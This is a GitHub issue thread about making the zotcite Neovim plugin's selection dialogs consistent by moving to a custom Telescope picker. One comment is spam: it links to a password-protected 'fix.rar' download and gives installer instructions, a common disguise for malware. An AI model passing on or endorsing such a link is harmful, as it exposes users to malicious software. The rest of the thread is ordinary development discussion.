### ISSUE TITLE
Inconsistent user interface (vim.ui.select vs custom Telescope dialog)

### ISSUE THREAD

**Issue by jalvesaq** [jalvesaq/zotcite#88]
The `:Zannotations` (and other commands) call `vim.ui.select`. My result for `:Zannotations neuroscience` is:

```
Select one of:
1: Greene (2019) The believing brain: evolution, neuroscience, and the spiritual instinct
2: Callard, Fitzgerald (2015) Rethinking Interdisciplinarity across the Social Sciences and Neurosciences
3: Jost, Nam, Amodio, Van Bavel (2014) Political neuroscience: the beginning of a beautiful friendship
4: Haas, Warren, Lauf (2020) Political neuroscience: understanding how the brain makes political decisions
Type number and <Enter> or click with the mouse (q or empty cancels):
```

If I use the Telescope `ui-select` extension the result is:

```
╭─────────────────────────────── Select one of ────────────────────────────────╮
│>                                                                        4 / 4│
├──────────────────────────────────────────────────────────────────────────────┤
│> Greene (2019) The believing brain: evolution, neuroscience, and the spiritua│
│  Callard, Fitzgerald (2015) Rethinking Interdisciplinarity across the Social │
│  Jost, Nam, Amodio, Van Bavel (2014) Political neuroscience: the beginning of│
│  Haas, Warren, Lauf (2020) Political neuroscience: understanding how the brai│
│                                                                              │
│                                                                              │
│                                                                              │
╰──────────────────────────────────────────────────────────────────────────────╯
```

And `:Zseek` is the only one to use a custom Telescope dialog:

![image](https://github.com/user-attachments/assets/35d683cc-fc92-43b6-821f-d3cbb5fe1062)

Perhaps we should use the custom Telescope dialog for everything. We can even create an Insert mode key binding for inserting citation keys (as an alternative, not replacement, for `cmp-zotcite`). Or we may have a global option allowing users to choose between `vim.ui.select` and the custom Telescope dialog. More options are good for users but mean more work for us. What do you think, @adam-coates ?

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by jalvesaq** [comment]
Note: I deleted a spam message.

Reason to keep only the custom Telescope dialog: we can open it with an empty search string and populate the list with all Zotcite references. With the Insert mode key binding, this would implement what @acorreya requested on #46.

**Comment by adam-coates** [comment]
This I agree with and I've already tested out telescope for the `Zselectannotations` command. But the issue is that the telescope picker list cannot refresh the list. This is document here https://github.com/nvim-telescope/telescope.nvim/issues/2016#issue-1276097274 

For instance, once an annotation selection has been made, it should be removed from the list of available annotations (ideally). 
As far as I can tell we can implement `telescope` in the annotations selection menu but that this means it might not remove an annotation that's been selected. 

I tried a few things for this problem and I can't get the telescope list to change the options once the menu is open, neither does opening a new picker list work.

**Comment by jalvesaq** [comment]
`:Zselectannotations` works in two steps. First, it selects the reference. Then it selects the annotations.

We don't need to change anything in the second step; your implementation is good. But we can use the custom Telescope dialog for the first step. I can make a pull request for this tomorrow to make more clear what I mean.

**Comment by adam-coates** [comment]
Ahh yeah it would be okay to implement it to select which reference the annotation comes from. 

In ways this should be straightforward as `Zseek` now already does this. 

Perhaps instead of displaying the abstract we display the reference info (journal, year etc) 

We can add a config option to allow users to choose what is displayed in the telescope preview window. 

But I'm definitely for having telescope in the commands 😀

**Comment by jalvesaq** [comment]
The main inconsistency I reported is fixed, but we could still improve the Telescope dialog.

I'm suggesting a new way of calculating the width of the author field on the branch `improve_seeker`.

**Comment by jalvesaq** [comment]
News on the `improve_seeker` branch: accept calling `seek.refs` with an empty string and use Telescope to insert citation key (`<C-X><C-C>`). This effectively allows us to close issue #46.

**Comment by jalvesaq** [comment]
> We can add a config option to allow users to choose what is displayed in the telescope preview window.

When we resize the terminal, Telescope automatically updates itself and shows the preview window if the terminal is large enough or hides it if the terminal doesn't have enough columns. In my opinion, we don't need further customization, unless there is demand for it.

**Comment by jalvesaq** [comment]
> Perhaps instead of displaying the abstract we display the reference info (journal, year etc)

The branch `improve_seeker` now formats the reference. It can still be improved but it's already more informative than before because it includes the book title or journal name. The message "No abstract" is displayed only for journal articles.

**Comment by jalvesaq** [comment]
Now, a custom syntax highlighting for the previewer:

![image](https://github.com/user-attachments/assets/ba91ce0d-7e22-4a3f-b04a-261b3fb0d425)
